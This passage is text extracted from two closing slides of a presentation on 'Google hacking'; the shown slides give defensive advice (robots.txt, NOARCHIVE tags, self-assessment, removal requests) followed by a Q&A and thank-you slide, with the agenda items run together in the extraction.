  • 65. Dirty Attacks With Google hacking How to Protect Google Hacking! What is Google   Keep sensitive data off the web Hacking?   Use common sense!! Basic security practices is all it What a Hacker Can do with vulnerable Web? takes. Defense in depth, act diligently when Google Hacking configuring web based devices and have a strong Database (GHDB) corporate security policy --------------------------------   Use Google hacking techniques to uncover your own Google Hacking basics security problems. So…..Google hack yourself! Google Advanced   Perform periodic Google Assessments Operators –  Update robots.txt -------------------------------- Locating Exploits and –  Use meta-tags: NOARCHIVE Finding Targets –  http://www.google.com/remove.html Tracking Down Web Servers, Login   Work with Google for help in removing security Portals, etc.. breaches. They are easy to work with and want to Dirty Attacks using help! You can find contact info on their site Googlebot Google Hacking Tools --------------------------------
  • 66. Dirty Attacks With Google hacking If someone is still in the room.. Q & A! What is Google Hacking? What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB) -------------------------------- Google Hacking THANK YOU basics Google Advanced Operators -------------------------------- Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot Google Hacking Tools --------------------------------